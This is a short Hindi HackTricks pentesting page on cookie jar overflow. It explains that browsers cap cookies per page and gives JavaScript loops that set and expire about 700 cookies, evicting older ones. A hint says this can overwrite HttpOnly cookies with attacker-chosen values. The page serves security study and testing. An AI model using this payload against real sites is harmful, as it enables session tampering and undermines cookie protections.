hacktricks/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

• यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सब्सक्रिप्शन प्लान्स देखें!
• आधिकारिक PEASS और HackTricks स्वैग प्राप्त करें
• हमारे विशेष NFTs कलेक्शन, The PEASS Family खोजें
• शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या हमें ट्विटर 🐦 @carlospolopm** पर फॉलो** करें।
• हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके HackTricks और HackTricks Cloud github repos में।

ब्राउज़रों के पास पेज के लिए जितने कुकी हो सकते हैं, उस पर सीमा होती है। इसलिए, यदि किसी कारणवश किसी कुकी को गायब करने की आवश्यकता हो, तो आप कुकी जार को ओवरफ्लो कर सकते हैं क्योंकि सबसे पुरानी कुकी हटा दी जाएगी:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

ध्यान दें, एक अलग डोमेन पर पोइंट करने वाले थर्ड पार्टी कुकीज को अधिलेखित नहीं किया जाएगा।

{% hint style="danger" %} यह हमला HttpOnly कुकीज को भी ओवरराइट करने के लिए उपयोग किया जा सकता है क्योंकि आप इसे हटा सकते हैं और फिर आप चाहते हैं उस मान के साथ इसे रीसेट कर सकते हैं।

इसे इस पोस्ट के साथ एक लैब के साथ जांचें। {% endhint %}